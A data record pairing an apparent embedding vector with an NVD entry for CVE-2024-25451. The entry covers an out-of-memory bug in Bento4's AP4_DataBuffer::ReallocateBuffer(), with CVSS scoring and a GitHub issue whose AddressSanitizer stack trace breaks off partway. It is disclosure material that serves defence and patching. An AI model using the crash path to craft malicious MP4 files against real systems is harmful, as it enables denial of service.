0.012152261100709438, -0.001737220911309123, -0.008661247789859772, -0.041332416236400604, -0.006514348555356264, -0.0029699390288442373, 0.00466941436752677, 0.018721846863627434, -0.005405914969742298, -0.005722610279917717, -0.022492730990052223, -0.014155542477965355, 0.002412039553746581, -0.009891203604638577, 0.010495134629309177, 0.0011885279091075063, -0.0007774684927426279, -0.0011765598319470882, 0.027662964537739754, 0.004264338873326778, -0.0009684983524493873, -0.0020198530983179808, -0.012984506785869598, -0.017823316156864166, 0.0075785918161273, 0.022153940051794052, 0.00267165619879961, -0.016232473775744438, -0.0032019366044551134, -0.00015282389358617365, -0.010252089239656925, 0.03723747283220291, 0.008904293179512024, -0.003730375785380602, -0.011297919787466526, -0.005689467769116163, -0.0046399543061852455, -0.00633390573784709, 0.02698538452386856, 0.034821752458810806, 0.008234077133238316, -0.018000075593590736, -0.00902949832379818, 0.023951001465320587, 0.019679296761751175, -0.00898530799895525, 0.0009482445893809199, 0.007217706646770239, 0.026926463469862938, 0.007615416776388884, 0.01068662479519844, -0.005243884865194559, 0.004234878811985254, -0.01612936519086361, 0.008617057465016842, 0.011769280768930912, 0.0023475957568734884, -0.01489940844476223, -0.0019903930369764566, 0.009677618741989136, 0.02156473882496357, -0.009478763677179813, -0.010804465040564537, -0.015746384859085083, -0.011761915870010853, 0.01665964536368847, -0.00009004871390061453, -0.0042422437109053135, 0.002343913307413459, 0.015009883791208267, 0.019679296761751175, 0.011320015415549278, -0.01717519573867321, -0.027633504942059517, -0.013220187276601791, -0.006683743558824062, 0.001185766072012484, 0.019738217815756798, 0.016099903732538223, -0.03679557144641876, 0.008307727053761482, 0.0007829922833479941, -0.024068841710686684, -0.01130528561770916, -0.021402709186077118, -0.0190164465457201, -0.005796260200440884, -0.003511267015710473, -0.014509063214063644, -0.0010099265491589904, -0.017941156402230263, 0.011121160350739956, 0.0006016289698891342, 0.016880596056580544, -0.0033713318407535553, 0.02471696212887764, 0.004835126921534538, -0.01655653491616249, -0.011408395133912563, -0.023361800238490105, -0.019576188176870346, -0.013330661691725254, -0.011732455343008041, 0.023774242028594017, -0.02988719753921032, -0.01454588770866394, -0.000723611912690103, 0.007696432061493397, 0.010215263813734055, 0.0029165425803512335, -0.006525395903736353, -0.010612974874675274, -0.013374852016568184, -0.001548492698930204, -0.00447055883705616, -0.010671894997358322, -0.022551650181412697, 0.01593787409365177, 0.000925689295399934, -0.01763182505965233, -0.0001509826397523284, 0.009648158214986324, -0.00933882873505354, -0.0008814992033876479, -0.007210341282188892, -0.010745544917881489, -0.0004925348330289125, -0.02305247075855732, -0.014354397542774677, -0.012608891353011131, -0.029224345460534096, 0.007718526758253574, 0.014177638106048107, 0.012586796656250954, -0.015076168812811375, -0.014103987254202366, -0.018707117065787315, 0.025276701897382736, -0.0025280385743826628, 0.01034783385694027, 0.007718526758253574, -0.000027388618036638945, 0.01372100692242384, 0.00295705022290349, -0.023892082273960114, 0.006157145369797945, -0.01323491707444191, -0.0008584836032241583, -0.00488299923017621, 0.011857660487294197, 0.01183556579053402, -0.00674634613096714, 0.01718992553651333, 0.014722648076713085, 0.002458070870488882, 0.01397878210991621, 0.006462793331593275, -0.010966494679450989, -0.01866292767226696, 0.004264338873326778, -0.011592520400881767, -0.009714444167912006, 0.0017307765083387494, -0.0004626144655048847, -0.004592081531882286, -0.011555694974958897, -0.0023291832767426968, -0.0067132036201655865, -0.011946041136980057, -0.009456668049097061, -0.0035757108125835657, -0.005313852336257696, -0.0248053427785635, 0.009235718287527561, -0.010229994542896748, 0.024864261969923973, -0.0010145296109840274, 0.005991432815790176, -0.010023773647844791, 0.024142492562532425, 0.003774565877392888, -0.007792177144438028, 0.002912860130891204, 0.021520549431443214, 0.02043052762746811, -0.0016709358897060156, -0.004617859143763781, -0.027471475303173065, 0.025895362719893456, -0.008948483504354954, 0.005689467769116163, -0.00977336335927248, -0.0010421484475955367, 0.007018851116299629, -0.008742262609302998, -0.0053285821340978146, 0.015275023877620697, -0.01981186866760254, -0.028237435966730118, -0.005777847487479448, -0.005468517541885376, 0.03140438720583916, 0.019237397238612175, -0.014553253538906574, 0.007666972000151873, -0.00815306231379509, -0.03496905043721199, -0.006959931459277868, -0.0012999236350879073, 0.022728409618139267, -0.005733657628297806, -0.009537683799862862, -0.017838045954704285, -0.01187975611537695, 0.03691341355443001, 0.021874070167541504, 0.016497615724802017, -0.03305415064096451, -0.01126846019178629, 0.008285632357001305, -0.008587597869336605, -0.0023696909192949533, -0.010104789398610592, 0.02560076303780079, -0.009390383027493954, -0.006451745983213186, -0.010590879246592522, 0.022242320701479912, 0.007295039016753435, 0.002434134716168046, 0.0075859567150473595, -0.00021657723118551075, 0.004091260954737663, 0.02698538452386856, 0.011356839910149574, -0.0153781333938241, 0.016895325854420662, 0.004481606651097536, -0.009979584254324436, -0.002089820569381118, -0.009928029030561447, 0.011666170321404934, -0.01710154488682747, -0.010546689853072166, -0.009117878042161465, -0.0037230108864605427, -0.009051593020558357, -0.007762717083096504, 0.014486967585980892, -0.018368326127529144, -0.020798778161406517, -0.00925044808536768, 0.009832283481955528, -0.0007765478803776205, -0.013072886504232883, -0.006208700593560934, 0.0004299322608858347, -0.00508553721010685, -0.017204655334353447, 0.011010685004293919, -0.0025169909931719303, -0.01841251738369465, -0.011592520400881767, 0.0014168431516736746, -0.028900286182761192, -0.012454226613044739, -0.032288189977407455, 0.026440374553203583, -0.0017593159573152661, -0.002772924955934286, -0.01494359876960516, -0.010001678951084614, -0.0071808816865086555, 0.014405952766537666, -0.019870787858963013, 0.004120721016079187, -0.017911696806550026, -0.010981224477291107, 0.035705551505088806, 0.025114672258496284, 0.007991031743586063, -0.0028226387221366167, -0.01200496032834053, -0.003925548400729895, 0.007821637205779552, -0.021505819633603096, -0.0020750905387103558, 0.019502537325024605, -0.009964853525161743, -0.030343826860189438, 0.008823278360068798, -0.023023011162877083, -0.029489487409591675, 0.0016967133851721883, -0.012027055956423283, -0.03382011130452156, 0.004452146589756012, 0.005008204374462366, 0.0020750905387103558, -0.01639450527727604, -0.03314252942800522, -0.030815187841653824, -0.009699713438749313, 0.01665964536368847, -0.013315931893885136, -0.007770081982016563, 0.011091699823737144, 0.02016538754105568, 0.022757871076464653, -0.020180117338895798, -0.007770081982016563, -0.004407956264913082, 0.009375653229653835, -0.01761709526181221, -0.000017549429685459472, -0.012829841114580631, 0.0021229630801826715, -0.022934630513191223, 0.02294936031103134, 0.016276665031909943, 0.01213753130286932, 0.0028484163340181112, 0.021947719156742096, -0.016423964872956276, -0.004768841899931431, 0.0002478785172570497, -0.006934153847396374, 0.007508624345064163, -0.020739858970046043, -0.010443579405546188, -0.007121961563825607, -0.007287674117833376, -0.017484525218605995, 0.007858461700379848, 0.008845373056828976, -0.01909009739756584, -0.00409494386985898, -0.007063041441142559, 0.02305247075855732, 0.011238999664783478, -0.030697347596287727, -0.003045430174097419, 0.008388742804527283, 0.016777485609054565, 0.013315931893885136, -0.01235111616551876, -0.021137569099664688, 0.010730814188718796, 0.0021689943969249725, -0.01726357638835907, -0.004448464140295982, -0.0028631463646888733, -0.00014568903134204447, 0.007829002104699612, -0.015142453834414482, -0.0009997996967285872, 0.011047509498894215, 0.009736538864672184, 0.02016538754105568, -0.01350005716085434, 0.012793016619980335, -0.003106191521510482, 0.008484487421810627, 0.009751268662512302, 0.0006992153357714415, 0.0024230871349573135, -0.004551574122160673, 0.016630185768008232, -0.013441137038171291, -0.0169247854501009, -0.0028244799468666315, -0.01340431161224842, 0.0006950725219212472, 0.006322858389467001, 0.04274649918079376, 0.003028858918696642, 0.0030159701127558947, 0.01894279755651951, 0.010561419650912285, 0.0219919104129076, 0.003999198786914349, 0.017131004482507706, 0.019399426877498627, 0.02779553458094597, 0.021181758493185043, 0.01152623537927866, -0.0006669934373348951, 0.004544209223240614, -0.011069605126976967, -0.003065684111788869, -0.03249441087245941, 0.001933314255438745, 0.003119080327451229, 0.020533638074994087, 0.006573268212378025, 0.006956248544156551, 0.0038703109603375196, -0.017838045954704285, -0.012387941591441631, 0.016880596056580544, 0.006466475781053305, 0.0046399543061852455, 0.0013349074870347977, -0.02330288104712963, 0.01147468015551567, -0.004643636755645275, -0.009449303150177002, 0.0038408508989959955, -0.036147452890872955, -0.012498416006565094, 0.012329021468758583, -0.0011793216690421104, 0.006687426008284092, 0.011894485913217068, -0.006006163079291582, 0.012233275920152664, 0.017587635666131973, 0.028149055317044258, -0.011857660487294197, 0.011187445372343063, -0.004584716632962227, 0.013006601482629776, 0.006613776087760925, 0.008094142191112041, -0.010311009362339973, 0.011187445372343063, 0.003205619053915143, -0.0014914138009771705, -0.012365845963358879, 0.006352317985147238, -0.0068236785009503365, -0.01095912978053093, -0.009626063518226147, 0.009957488626241684, 0.0073834192007780075, 0.0025998472701758146, 0.03278901055455208, -0.002719528740271926, -0.004043388646095991, -0.005785212852060795, 0.013242281973361969, 0.000315084180328995, -0.03234710916876793, -0.013367487117648125, -0.015275023877620697, -0.0062050181441009045, 0.004382179118692875, -0.014914138242602348, -0.00768906669691205, -0.0033105704933404922, 0.02339126169681549, -0.01379465777426958, 0.02174150012433529, -0.015672734007239342, 0.0007889763219282031, 0.0006467396160587668, -0.0021082330495119095, 0.006956248544156551, -0.0175287164747715, -0.0017593159573152661, -0.017145736142992973, 0.012122800573706627, 0.0025869584642350674, 0.0027710837312042713, -0.03491013124585152, 0.009869108907878399, 0.006941518746316433, 0.019163746386766434, -0.0028686700388789177, 0.022595839574933052, 0.03661881387233734, 0.0003259015502408147, -0.014258652925491333, -0.01929631642997265, 0.00024051350192166865, 0.006322858389467001, 0.018383055925369263, 0.013743102550506592, 0.017381414771080017, -0.003896088572219014, -0.00898530799895525, -0.0030785726848989725, 0.005634230095893145, 0.007335546426475048, 0.00246359477750957, 0.002690068678930402, -0.01988551765680313, 0.0023973097559064627, 0.007276626769453287, -0.03750261291861534, -0.0143323028460145, -0.01489204354584217, 0.01761709526181221, -0.003896088572219014, 0.022728409618139267, 0.01345586683601141, -0.004010246135294437, 0.004975061863660812, -0.023877350613474846, -0.0010182121768593788, -0.01551070436835289, 0.025438733398914337, 0.009044228121638298, 0.002163470722734928, 0.00002305879934283439, 0.00047918575000949204, 0.004923507105559111, 0.0050560771487653255, 0.0028741939458996058, -0.001872552908025682, -0.012564701028168201, -0.006727933418005705, 0.015481243841350079, -0.013529516756534576, 0.017042625695466995, 0.022315969690680504, -0.0303143672645092, -0.013463231734931469, -0.02953367680311203, -0.00048010636237449944, 0.024245601147413254, -0.015746384859085083, -0.012910856865346432, 0.004349036607891321, -0.03812127560377121, -0.0011581472354009748, 0.002564863534644246, -0.011629345826804638, 0.004890364594757557, 0.00929463841021061, -0.005210742354393005, -0.026278343051671982, 0.00773325702175498, -0.005785212852060795, 0.018633466213941574, 0.0109959552064538, -0.031757909804582596, 0.0017169672064483166, 0.01953199692070484, 0.004853539168834686, 0.0021063918247818947, -0.0054942951537668705, 0.02110810950398445, -0.0033381893299520016, 0.006267620716243982, -0.006654283497482538, -0.01630612462759018, -0.03066788800060749, 0.012174355797469616, 0.023877350613474846, 0.0009312130277976394, 0.004853539168834686, 0.0026477198116481304, 0.0008787373662926257, 0.01963510736823082, 0.022654760628938675, -0.0009878315031528473, 0.016718564555048943, -0.01875130645930767, 0.00329952291212976, 0.0018246803665533662, -0.0007305166218429804, -0.005678419955074787, -0.018780766054987907, -0.000839610758703202, -0.0031853653490543365, 0.0005040426622144878, 0.019428888335824013, -0.006963613908737898, 0.011695630848407745, -0.002804226242005825, -0.01657126471400261, -0.010244724340736866, 0.011084334924817085, 0.012594161555171013, -0.0008943880093283951, 0.0017712840344756842, -0.005545849911868572, -0.007479164283722639, 0.007976301945745945, -0.0034265692811459303, -0.014413317665457726, 0.0008943880093283951, 0.03573501110076904, -0.01174718514084816, 0.0027213699650019407, 0.007051993627101183, 0.0008184363832697272, -0.00119497231207788, -0.00818988773971796, -0.015127724036574364, 0.014207097701728344, 0.006867868825793266, -0.02043052762746811, -0.0055642626248300076, -0.03066788800060749, 0.016689104959368706, -0.01288876123726368, 0.027397824451327324, -0.0058183553628623486, -0.008786452934145927, 0.005045029334723949, 0.02068093791604042, 0.008499217219650745, 0.008226712234318256, -0.010399389080703259, -0.007398148998618126, 0.0014242081670090556, 0.030991947278380394, -0.012262736447155476, 0.013603167608380318, 0.005247567314654589, -0.011916580609977245, 0.007306086365133524, -0.020371608436107635, 0.014987788163125515, 0.033437129110097885, -0.000500820460729301, -0.005059759598225355, 0.015142453834414482, -0.0018430929630994797, -0.0035757108125835657, 0.01204915065318346, 0.016703834757208824, 0.003641995834186673, -0.005777847487479448, 0.007725892122834921, 0.003822438418865204, -0.0014794457238167524, 0.02708849497139454, -0.0037635182961821556, 0.0026845450047403574, 0.008543407544493675, 0.0014242081670090556, 0.011202175170183182, 0.02041579782962799, 0.020813507959246635, -0.018707117065787315, 0.021358519792556763, 0.0010624021524563432, -0.010031139478087425, -0.016806945204734802, -0.011032779701054096, -0.029386376962065697, 0.019399426877498627, -0.012365845963358879, 0.02278733067214489, 0.02200664021074772, 0.013087616302073002, 0.008771723136305809, 0.00030265573877841234, 0.007136691361665726, -0.012793016619980335, 0.01157042570412159, -0.013573707081377506, 0.0029073364567011595, -0.010038504377007484, -0.0011222428875043988, -0.005538485012948513, 0.012240640819072723, -0.004249608609825373, -0.005011886823922396, 0.006495935842394829, -0.012203816324472427, 0.006241843104362488, 0.009692348539829254, 0.037208013236522675, 0.012513145804405212, 0.001807188498787582, 0.009707078337669373, 0.014671092852950096, -0.01646815426647663, 0.010981224477291107, -0.03426200896501541, 0.041862696409225464, -0.004492653999477625, -0.008852737955749035, -0.01464163325726986, 0.014339667744934559, -0.005059759598225355, -0.006098225712776184, 0.005365407094359398, -0.01639450527727604, 0.006838408764451742, 0.015245563350617886, -0.006727933418005705, -0.012807746417820454, -0.0004925348330289125, -0.024584392085671425, 0.00436008395627141, 0.03355497121810913, 0.008587597869336605, 0.002644037362188101, 0.004032341297715902, -0.00267165619879961, -0.013220187276601791, 0.02294936031103134, 0.023965731263160706, -0.007026216480880976, 0.013080251403152943, -0.0040397061966359615, -0.010841289535164833, -0.016954245045781136, 0.0008299442124553025, -0.008094142191112041, 0.005428009666502476, -0.0013091298751533031, 0.018073726445436478, -0.0022831519600003958, -0.009972219355404377, 0.0157611146569252, 0.0028926064260303974, -0.02032741904258728, -0.02023903839290142, -0.00035513140028342605, -0.01209334097802639, -0.005126044619828463, -0.006267620716243982, 0.001903854194097221, 0.005181282293051481, -0.0003268221626058221, -0.006433333270251751, 0.007784811779856682, 0.003474441822618246, -0.0021284869872033596, 0.006510665640234947, 0.029430566355586052, 0.030093416571617126, -0.003050954081118107, -0.013094982132315636, -0.009677618741989136, -0.015746384859085083, -0.00466573191806674, 0.0075859567150473595, -0.022065559402108192, -0.02076931856572628, -0.0033768555149435997, 0.0040802136063575745, 0.013853577896952629, 0.005973020568490028, -0.008926387876272202, -0.0013625262072309852, 0.010399389080703259, 0.005221789702773094, 0.011504140682518482, 0.014575348235666752, 0.023199770599603653, 0.015230833552777767, -0.0011314491275697947, 0.000348456873325631, -0.022993551567196846, -0.026248883455991745, 0.027191603556275368, 0.005774165038019419, 0.018000075593590736, 0.014980423264205456, 0.011121160350739956, 0.020666208118200302, 0.0148552181199193, 0.016350314021110535, -0.014494333416223526, -0.002795020118355751, 0.014663727954030037, 0.015002518892288208, 0.010730814188718796, 0.007777446880936623, -0.002588799921795726, -0.014840488322079182, 0.010473039001226425, 0.01814737543463707, 0.002034583128988743, 0.013072886504232883, 0.014302843250334263, -0.0010366246569901705, 0.01577584445476532, -0.010944399982690811, 0.024142492562532425, 0.017587635666131973, -0.0023752145934849977, -0.017057355493307114, 0.006540125701576471, 0.015039343386888504, 0.03125708922743797, -0.002270263386890292, -0.01822102628648281, 0.0011737978784367442, -0.010797100141644478, -0.0003912659885827452, -0.03066788800060749, 0.032818470150232315, 0.005181282293051481, -0.009500858373939991, 0.01209334097802639, -0.012630986049771309, -0.007784811779856682, -0.013890402391552925, -0.01710154488682747, -0.017204655334353447, 0.013485327363014221, 0.010244724340736866, -0.023170311003923416, 0.011283189989626408, 0.004087578505277634, -0.018869146704673767, -0.001553095760755241, 0.0029073364567011595, -0.0007774684927426279, -0.002934955060482025, 0.004809349309653044, 0.006919423583894968, 0.01231429073959589, -0.009847014211118221, -0.0006886281189508736, 0.009095783345401287, -0.03137492761015892, -0.02672024443745613, 0.0101710744202137, -0.028532035648822784, -0.007140373811125755, -0.00009016379044624045, 0.009368288330733776, 0.011710360646247864, -0.02822270616889, 0.0007466275710612535, -0.015805304050445557, -0.001979345455765724, -0.01235848106443882, -0.007000438868999481, 0.002656926168128848, 0.004430051427334547, -0.028355276212096214, 0.01511299330741167, 0.0036456782836467028, 0.01239530649036169, 0.013308566994965076, 0.014700553379952908, -0.01008269377052784, 0.027824994176626205, 0.004905094392597675, -0.0038887234404683113, 0.009368288330733776, 0.013787291944026947, 0.015569623559713364, 0.014479602687060833, -0.013021331280469894, 0.003980786073952913, 0.010090058669447899, -0.014472237788140774, -0.011099064722657204, -0.00020932729239575565, 0.021446898579597473, 0.008300362154841423, -0.004117038566619158, -0.008337187580764294, -0.003421045606955886, -0.012476321309804916, -0.0034155219327658415, -0.00295705022290349, 0.009066322818398476, -0.007939477451145649, -0.011614615097641945, 0.007265578955411911, 0.007412879262119532, 0.014833123423159122, 0.011923945508897305, 0.0023604845628142357, 0.0014122399734333158, 0.013529516756534576, -0.013257011771202087, -0.005184964742511511, -0.007099866401404142, 0.00648120604455471, 0.004187006037682295, -0.01240267138928175, -0.029946116730570793, 0.0059104179963469505, 0.002673497423529625, 0.01936996728181839, -0.01832413673400879, 0.012918221764266491, -0.0011111954227089882, 0.004102308768779039, 0.0022002956829965115, 0.015540163964033127, 0.0029147013556212187, 0.009692348539829254, -0.028900286182761192, 0.009684983640909195, 0.009964853525161743, 0.0007898969342932105, 0.03918183594942093, -0.006098225712776184, 0.0010329422075301409, -0.014973058365285397, -0.005947242956608534, -0.0018283629324287176, -0.006834726314991713, -0.008263537660241127, 0.0028834000695496798, -0.024304522201418877, -0.004673096816986799, 0.015569623559713364, 0.00690469378605485, -0.004411639180034399, 0.013109711930155754, 0.01126846019178629, -0.00818988773971796, -0.009994314052164555, 0.009007402695715427, 0.008469757623970509, 0.0016810627421364188, -0.017307765781879425, -0.005011886823922396, 0.006039305590093136, 0.003389744320884347, -0.006392825860530138, 0.047283343970775604, 0.01125373039394617, 0.01570219360291958, -0.003119080327451229, 0.0032626979518681765, -0.001955409301444888, -0.015171913430094719, -0.02461385168135166, -0.008388742804527283, 0.006794218439608812, -0.00004813146733795293, 0.011062240228056908, 0.009383018128573895, -0.0077479868195950985, 0.0007636591326445341, 0.014096622355282307, -0.005394867155700922, 0.006208700593560934, -0.013463231734931469, -0.017042625695466995, -0.01813264563679695, -0.0019498855108395219, 0.026617133989930153, -0.013684182427823544, -0.01612936519086361, -0.0022536921314895153, 0.015039343386888504, 0.0030914614908397198, -0.021137569099664688, 0.003544409526512027, 0.031964126974344254, -0.008344552479684353, -0.016070444136857986, -0.000845594797283411, 0.005516389850527048, -0.0031393340323120356, 0.023685861378908157, 0.010627704672515392, 0.014192367903888226, -0.02954840660095215, -0.001925949240103364, 0.00018274423200637102, -0.0018256009789183736, 0.006930471397936344, -0.00845502782613039, 0.007202976383268833, 0.007770081982016563, 0.020268497988581657, 0.027221065014600754, 0.010266819037497044, 0.016630185768008232, 0.016983704641461372, -0.010104789398610592, 0.010200534015893936, 0.006842091213911772, -0.0053506772965192795, -0.006407555658370256, -0.00462154159322381, 0.002881558844819665, -0.011150619946420193, -0.00784373190253973, -0.0035646632313728333, -0.01042148470878601, -0.006050352938473225, -0.021535279229283333, -0.007873192429542542, 0.008631788194179535, 0.010281548835337162, -0.02592482417821884, 0.02946002595126629, -0.006514348555356264, -0.0030914614908397198, -0.01204915065318346, -0.005844132974743843, -0.022463269531726837, -0.004282751120626926, -0.010480404831469059, -0.0030362240504473448, 0.011040144599974155, 0.010612974874675274, 0.02287571132183075, -0.01777912676334381, 0.0248053427785635, -0.0044263689778745174, 0.006794218439608812, 0.009279908612370491, -0.014663727954030037, -0.002564863534644246, -0.011128525249660015, 0.019487807527184486, 0.02507048286497593, -0.0032479679211974144, -0.002610894851386547, -0.017027895897626877, 0.0191784780472517, -0.017219385132193565, -0.005729975178837776, -0.01371364202350378, -0.0020088055171072483, 0.009707078337669373, 0.026941195130348206, -0.005317534785717726, -0.014310208149254322, 0.007976301945745945, 0.013743102550506592, 0.008234077133238316, -0.00015455005632247776, -0.008639153093099594, -0.015820033848285675, 0.01953199692070484, 0.008396107703447342, -0.004382179118692875, -0.016718564555048943, 0.0002591561642475426, 0.01292558666318655, 0.01156306080520153, -0.006002480164170265, -0.006289715878665447, 0.01997389830648899, 0.004448464140295982, -0.006525395903736353, 0.006786853540688753, 0.0148552181199193, 0.010966494679450989, 0.010406753979623318, -0.005052394699305296, -0.006289715878665447, 0.026175232604146004, 0.0014647156931459904, 0.022802060469985008, 0.0065511735156178474, -0.004805666860193014, 0.020931348204612732, -0.0017501097172498703, 0.01909009739756584, 0.02568914368748665, -0.006963613908737898, 0.010311009362339973, 0.02322923019528389, 0.013131806626915932, 0.014435413293540478, 0.046576302498579025, 0.003268221626058221, 0.004584716632962227, -0.019914977252483368, 0.010104789398610592, 0.0025630223099142313, 0.014921503141522408, -0.015054073184728622, 0.004308528732508421, 0.022551650181412697, 0.035027969628572464, 0.01769074611365795, 0.003932913765311241, -0.007044628728181124, -0.00024258490884676576, 0.018707117065787315, 0.006381778046488762, -0.005354359745979309, 0.004816714208573103, -0.015275023877620697, -0.00004309679570724256, -0.004757794085890055, -0.0018476960249245167, 0.014811028726398945, 0.006017210427671671, -0.004768841899931431, -0.015569623559713364, 0.018117915838956833, -0.030196527019143105, -0.021314328536391258, -0.017057355493307114, 0.01577584445476532, 0.0027526712510734797, 0.014707918278872967, 0.0030988266225904226, 0.017322495579719543, -0.006878916174173355, 0.011754550971090794, 0.018957527354359627, 0.027662964537739754, 0.010288914665579796, -0.018117915838956833, 0.018692387267947197, 0.04804930463433266, -0.0009464033646509051, 0.008491852320730686, 0.0064591108821332455, 0.01090757455676794, -0.000846975774038583, 0.005833085160702467, -0.012748826295137405, 0.005457469727844, -0.0018044266616925597, -0.01691005565226078, 0.027810264378786087, 0.016689104959368706, 0.0031264452263712883, 0.035705551505088806, -0.005936195142567158, -0.005236519500613213, -0.012196451425552368, -0.0038334860000759363, 0.014973058365285397 ]
CVE-2024-25451
2024-02-09T15:15:09.143000
Bento4 v1.6.0-640 was discovered to contain an out-of-memory bug via the AP4_DataBuffer::ReallocateBuffer() function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/872" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-640:*:*:*:*:*:*:*", "matchCriteriaId": "8C7DB535-F27C-455F-9E99-3EF80B828022", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/872
[ "Exploit", "Issue Tracking" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hi, Thanks for fixing the issue #741, but still there is out-of-memory bug in the latest version (1.6.0-640) of multiple programs because of the function AP4_DataBuffer::ReallocateBuffer() at Ap4DataBuffer.cpp:210. We observed the same bug in mp4info, mp42aac, mp42avc, mp4decrypt, and mp4dump with the same root cause. Here is the output of program with address sanitizer attached. ### Bug Report ================================================================= ==977537==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x8021ffba bytes #0 0x7fb17bc08787 in operator new[](unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cc:107 #1 0x557daf86f117 in AP4_DataBuffer::ReallocateBuffer(unsigned int) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4DataBuffer.cpp:210 #2 0x557daf86f319 in AP4_DataBuffer::SetDataSize(unsigned int) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4DataBuffer.cpp:151 #3 0x557daf8c68b2 in AP4_AudioSampleEntry::ReadFields(AP4_ByteStream&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4SampleEntry.cpp:502 #4 0x557daf8c5d98 in AP4_SampleEntry::Read(AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4SampleEntry.cpp:108 #5 0x557daf8cc2dd in AP4_AudioSampleEntry::AP4_AudioSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4SampleEntry.cpp:420 #6 0x557daf8cc3d2 in AP4_MpegAudioSampleEntry::AP4_MpegAudioSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4SampleEntry.cpp:655 #7 0x557daf8cc3d2 in AP4_Mp4aSampleEntry::AP4_Mp4aSampleEntry(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4SampleEntry.cpp:844 #8 0x557daf850a3b in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:286 #9 0x557daf8524e0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #10 0x557daf8dbac4 in AP4_StsdAtom::AP4_StsdAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4StsdAtom.cpp:101 #11 0x557daf8dc09b in AP4_StsdAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4StsdAtom.cpp:57 #12 0x557daf84f9d0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:458 #13 0x557daf8524e0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #14 0x557daf85f3ea in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:194 #15 0x557daf85f793 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:139 #16 0x557daf85fcbd in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4ContainerAtom.cpp:88 #17 0x557daf84eca4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:816 #18 0x557daf8524e0 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:234 #19 0x557daf872856 in AP4_DrefAtom::AP4_DrefAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4DrefAtom.cpp:84 #20 0x557daf872c33 in AP4_DrefAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4DrefAtom.cpp:50 #21 0x557daf84ecf4 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ubuntu/targets/Bento4-1.6.0-640_sanitizer/Source/C++/Core/Ap4AtomFactory.cpp:580 #22 0x557daf8524e0 in 